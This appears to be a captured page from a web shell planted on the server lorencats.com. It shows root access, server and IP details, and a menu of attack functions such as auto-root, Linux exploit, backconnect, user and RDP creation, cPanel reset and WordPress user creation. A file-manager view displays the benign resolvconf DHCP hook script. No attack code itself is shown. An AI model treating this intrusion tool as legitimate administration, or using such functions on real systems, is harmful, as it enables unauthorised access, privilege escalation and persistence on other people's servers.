Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
dhcp /
dhclient-enter-hooks.d /
[ HOME SHELL ]
Name
Size
Permission
Action
debug
1.39
KB
-rw-r--r--
resolvconf
1.27
KB
-rw-r--r--
samba
1.87
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : resolvconf
# resolvconf support for dhclient3 NL=" " if [ -x /sbin/resolvconf ]; then case "$reason" in BOUND|RENEW|REBIND|REBOOT|TIMEOUT) make_resolv_conf() { local nameserver conf= if [ -n "$new_domain_name" ]; then conf="${conf}domain $new_domain_name$NL" fi if [ -n "$new_domain_search" ]; then conf="${conf}search $new_domain_search$NL" fi for nameserver in $new_domain_name_servers; do conf="${conf}nameserver $nameserver$NL" done if [ -n "$conf" -a -n "$interface" ]; then conf="# resolv.conf for $interface$NL$conf" printf %s "$conf" | \ /sbin/resolvconf -a "$interface" fi } ;; BOUND6|RENEW6|REBIND6) make_resolv_conf() { local nameserver conf= if [ -n "$new_dhcp6_domain_search" ]; then conf="${conf}search $new_dhcp6_domain_search$NL" fi for nameserver in $new_dhcp6_name_servers; do conf="${conf}nameserver $nameserver$NL" done if [ -n "$conf" -a -n "$interface" ]; then conf="# resolv.conf for $interface$NL$conf" printf %s "$conf" | \ /sbin/resolvconf -a "$interface.inet6" fi } ;; EXPIRE|FAIL|RELEASE|STOP) [ -z "$interface" ] || /sbin/resolvconf -f -d "$interface" ;; EXPIRE6|RELEASE6|STOP6) [ -z "$interface" ] || /sbin/resolvconf -f -d "$interface.inet6" ;; esac fi
Close